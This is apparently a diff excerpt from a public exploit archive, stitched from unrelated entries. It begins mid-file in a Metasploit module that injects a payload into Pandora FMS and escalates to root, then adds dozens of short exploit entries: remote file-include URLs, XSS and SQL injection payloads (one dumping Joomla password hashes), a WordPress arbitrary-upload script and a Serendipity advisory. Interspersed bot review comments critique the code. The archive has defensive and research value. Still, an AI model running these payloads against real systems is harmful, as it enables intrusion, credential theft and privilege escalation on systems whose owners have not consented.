OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),
], self.class)
end
def on_new_session(client)
print_status("#{peer} - Trying to escalate privileges to root")
[
# ignore SIGHUP so the server doesn't kill our root shell
"trap '' HUP",
# Spawn a pty for su/sudo
"python -c 'import pty;pty.spawn(\"/bin/sh\")'",
# Su to the passwordless "artica" account
"su - artica",
# The "artica" use has sudo rights without the need for a
# password, thus gain root priveleges
"sudo -s",
].each do |command|
vprint_status(command)
client.shell_write(command + "\n")
end
super
end
def check
# Check version
print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "anyterm.html")
})
if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")
print_good("#{peer} - Pandora FMS Remote Gateway Detected!")
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Sending payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/anyterm-module"),
'vars_post' => {
'a' => "open",
'p' => "`#{payload.encoded}`"
}
})
if !res || res.code != 200
fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
end
end
end
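Review bot: `check` returns `Exploit::CheckCode::Safe` whenever the GET for anyterm.html does not come back 200 with the expected banner, including the case where `res` is nil because the host never answered; a transport failure or a different landing page does not establish that the target is safe, so the fallback should be `Exploit::CheckCode::Unknown` (or `Unreachable` for a nil response) and `Safe` reserved for a positive signal. The `'References'` array is left empty even though the description names affected versions and a disclosure date is given — an advisory or vendor URL belongs there. Comment nits: the header link reads `http//metasploit.com/download` (missing colon), and in `on_new_session` "The "artica" use has sudo rights" and "priveleges" should read "user" and "privileges". `exploit` likewise reports a nil `res` as `Failure::Unknown`, where `Failure::Unreachable` is the conventional code for no response.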


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28413/info
The 'snircd' and 'ircd' daemons are prone to a remote denial-of-service vulnerability because the application fails to properly sanitize user-supplied input.
Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users.
This issue affects versions up to and including 'snircd' 1.3.4 and 'ircu' 2.10.12.12.
/mode nickname i i i i i i i i i i i i i i i r r r r s


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28405/info
Apple Safari is prone to a content-spoofing vulnerability that allows attackers to populate a vulnerable Safari browser window with arbitrary malicious content. During such an attack, the URL and window title will display the intended site, while the body of the webpage is spoofed.
Safari 3.1 running on Microsoft Windows is reported vulnerable.
NOTE: This issue may be related to the vulnerability discussed in BID 24457 (Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability).
<html> Safari browser 3.1 (525.13) spoofing by Juan Pablo Lopez Yacubian <html> <head> <title>Recipe 6.6</title> <script type="text/javascript"> var newWindow; function makeNewWindow() { if (!newWindow || newWindow.closed) { newWindow = window.open('http://www.google.com.ar/','_self'); setTimeout("writeToWindow()", 50); } else if (newWindow.focus) { newWindow.focus(); } } function writeToWindow() { var newContent = "<html><head><title>Google</title></head>"; newContent += "<body> <h1>FAKE PAGE</h1>"; newWindow.document.write(newContent); newWindow.document.close(); } </script> </head> <body> <form> <input type="button" value="test spoof!" onclick="makeNewWindow();"/> </form> </body> </html>

9
platforms/php/remote/31479.txt Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/index.php3?DOCUMENT_ROOT=ZoRLu.txt?

27
platforms/php/webapps/31424.txt Executable file

@ -0,0 +1,27 @@
# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
# Google Dork: inurl:/wp-content/themes/dandelion/
# Date: 31/01/2014
# Exploit Author: TheBlackMonster (Marouane)
# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
# Software Link: Not Available
# Version: Web Application
# Tested on: Mozilla, Chrome, Opera -> Windows & Linux
?#?Greetz? : PhantomGhost, Deto Beiber, All Moroccan Hackers.
We are Moroccans, we are genuis !
<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
File Access :
http://127.0.0.1/uploads/[years]/[month]/your_shell.php
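Review bot: The header line `?#?Greetz? : PhantomGhost, ...` has lost non-ASCII characters to an encoding conversion (each `?` stands where a byte could not be decoded), so the file was probably saved without a UTF-8 round-trip; re-importing it from the original submission would preserve the author's text. The title misspells "Arbitrary" as "Arbitry", and the same spelling is carried into the files.csv description for 31424, so both should be corrected together or both left as submitted. `# Version: Web Application` does not identify a theme version, which leaves a reader unable to tell whether a given Dandelion release is affected; if the tested theme version is known it belongs on that line.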

35
platforms/php/webapps/31458.txt Executable file

@ -0,0 +1,35 @@
# Exploit: PHP Webcam Video Conference - LFI/XSS
# Date: 06/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.videowhisper.com/
# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference
# Solution: Upgrade from to the new version on videowhisper vendor homepage.
[1] Local File Include - rtmp_login.php
P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd
[+] rtmp_rlogin.php
$session = $_GET['s'];
$filename1 = "uploads/_sessions/$session";
if (file_exists($filename1))
{
echo implode('', file($filename1));
}
else
{
echo "VideoWhisper=1&login=0";
}
?>
[2] XSS Reflected
P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]
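Review bot: The code excerpt shows `$session` taken from `$_GET['s']`, concatenated into `uploads/_sessions/$session` and then read back with `file()` and echoed, which is a path-traversal file disclosure rather than a file inclusion — nothing is `include`d or executed — so "Local File Include" in the `[1]` heading overstates the class; "Arbitrary File Read via Path Traversal" would match the snippet. The `[+] rtmp_rlogin.php` label does not match the `rtmp_login.php` named in the heading and in the PoC URL, so one of the two is a typo. The excerpt ends with `?>` but has no opening tag, so it should be marked as a partial listing, and the `# Solution:` line reads "Upgrade from to the new version", which is missing a word. The defensive fix implied by the snippet is to reject any `s` value that is not a bare session identifier (allow-list its characters, or require `basename($session) === $session`) before building the path.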

24
platforms/php/webapps/31459.txt Executable file

@ -0,0 +1,24 @@
# Exploit Title: Joomla 3.2.1 sql injection
# Date: 05/02/2014
# Exploit Author: kiall-9@mail.com
# Vendor Homepage: http://www.joomla.org/
# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip
# Version: 3.2.1 (default installation with Test sample data)
# Tested on: Virtualbox (debian) + apache
POC=>
http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\
will cause an error:
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT `t`.`id` FROM `k59cv_tags` AS t INNER JOIN `k59cv_contentitem_tag_map` AS m ON `m`.`tag_id` = `t`.`id` AND `m`.`type_alias` = 'com_weblinks.categories' AND `m`.`content_item_id` IN ( \) Array ( [type] => 8 [message] => Undefined offset: 0 [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php [line] => 203 )
I modified the original error.php file with this code --- <?php print_r(error_get_last()); ?> --- in order to obtain something useful. ;-)
Now i can easily exploit this flaw:
http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29
and obtain the hash:
1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT `m`.`tag_id`,`m`.`core_content_id`,`m`.`content_item_id`,`m`.`type_alias`,COUNT( `tag_id`) AS `count`,`t`.`access`,`t`.`id`,`ct`.`router`,`cc`.`core_title`,`cc`.`core_alias`,`cc`.`core_catid`,`cc`.`core_language` FROM `k59cv_contentitem_tag_map` AS `m` INNER JOIN `k59cv_tags` AS `t` ON m.tag_id = t.id INNER JOIN `k59cv_ucm_content` AS `cc` ON m.core_content_id = cc.core_content_id INNER JOIN `k59cv_content_types` AS `ct` ON m.type_alias = ct.type_alias WHERE `m`.`tag_id` IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (`m`.`content_item_id` <> 0 ) union select password from `k59cv_users` -- ) OR `m`.`type_alias` <> 'com_weblinks.categories') AND `cc`.`core_state` = 1 GROUP BY `m`.`core_content_id` ORDER BY `count` DESC LIMIT 0, 5
CheerZ>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28399/info
phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpMyChat 0.14.5 is vulnerable; other versions may also be affected.
http://www.example.com/chat/setup.php3?Lang="<xss>

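--- a/platforms/php/webapps/31468.txt
+++ b/platforms/php/webapps/31468.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/28400/info
+My Web Doc is prone to multiple authentication-bypass vulnerabilities.
+Attackers can leverage these issues to compromise the application, which could aid in other attacks.
+My Web Doc 2000 Final is vulnerable; other versions may also be affected.
+http://www.example.com/mywebdocadd.php3?x
+http://www.example.com/mywebdoccalendaradd.php3?x
+http://www.example.com/mywebdoclisting.php3?x
+http://www.example.com/mywebdocchangepassword.php3?x
+http://www.example.com/mywebdocadduser.php3?x
+http://www.example.com/mywebdocuserlisting.php3?x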

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28401/info
ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ooComments 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/classes/class_admin.php?PathToComment=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28401/info
ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ooComments 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/classes/class_comments.php?PathToComment=ZoRLu.txt?


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28402/info
TinyPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?PHPSESSID="><xss>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28403/info
cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/frontend/x/manpage.html?<xss>


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28412/info
Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/locate.php3?DOCUMENT_ROOT=ZoRLu.txt?,


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/search_results.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/classifieds/index.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/classifieds/view.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/index.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/manager.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/pass.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/remember.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/sign-up.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/update.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/userSet.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/verify.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterCats.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterNews.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterTheme.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/color_help.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createdb.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createL.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createM.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createNews.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createP.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createS.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createT.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/index.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/mailadmin.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/setUp.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/include/sendit.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/include/sendit2.php3?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/include/adminHead.inc?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/include/usersHead.inc?DOCUMENT_ROOT=ZoRLu.txt?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/style/default.scheme.inc?DOCUMENT_ROOT=ZoRLu.txt?

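--- a/platforms/php/webapps/31516.txt
+++ b/platforms/php/webapps/31516.txt
@@ -0,0 +1,74 @@
+Advisory: Serendipity 1.7.5 (Backend) - Multiple security vulnerabilities
+Advisory ID: SSCHADV2014-003
+Author: Stefan Schurtz
+Affected Software: Successfully tested on Serendipity 1.7.5
+Vendor URL: http://www.s9y.org/
+Vendor Status: fixed
+==========================
+Vulnerability Description
+==========================
+The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities
+==========================
+PoC-Exploit
+==========================
+// Stored-XSS with "Real name"
+(1) Login as "Standard editor" user
+(2) Under "Personal Settings" set your "Real name" to "><script>alert(document.cookie)</script>
+The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users)
+// SQL-Injection - with "serendipity[install_plugin]"
+http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]
+// Reflected XSS_1 - "serendipity[install_plugin]"
+http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b<script>alert(1)</script>%2f%2f912
+// Reflected XSS_2 - "serendipity[id]"
+POST http://[target]/serendipity/serendipity_admin.php?
+serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Btimestamp%5D=1391086127&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=0fb9473e000f67c7d530e0698c8ff2dc&serendipity%5Btitle%5D=test1&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391086127&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A48&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test1&serendipity%5Ballow_comments%5D=true&serendipity%5Bextended%5D=
+// Reflected XSS_3 - "serendipity[timestamp]"
+POST http://[target]/serendipity/serendipity_admin.php?
+serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=d9e231ef9eaeb5e58336806484de7600&serendipity%5Btitle%5D=test&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391084636&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A23&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test%3Cstrong%3E%3C%2Fstrong%3E%3Cblockquote%3E%3C%2Fblockquote%3E&serendipity%5Ballow_comments%5D=true&serendipity%5Bmoderate_comments%5D=true&serendipity%5Bextended%5D
+==========================
+Solution
+==========================
+Upgrade to the latest version Serendipity 1.7.7
+==========================
+Disclosure Timeline
+==========================
+30-Jan-2014 - developer informed by email
+30-Jan-2014 - feedback from developer
+31-Jan-2014 - first diff tested
+03-Feb-2014 - second diff tested
+04-Feb-2014 - third diff tested
+06-Feb-2014 - release of Serendipity 1.7.7
+==========================
+Credits
+==========================
+Vulnerabilities found and advisory written by Stefan Schurtz.
+==========================
+References
+==========================
+http://s9y.org/
+http://blog.s9y.org/archives/253-Serendipity-1.7.7-released.html
+http://www.darksecurity.de/advisories/2014/SSCHADV2014-003.txt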
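--- a/platforms/php/webapps/31517.txt
+++ b/platforms/php/webapps/31517.txt
@@ -0,0 +1,35 @@
+# Exploit Title: [CTERA Project Folders - Stored XSS]
+ 
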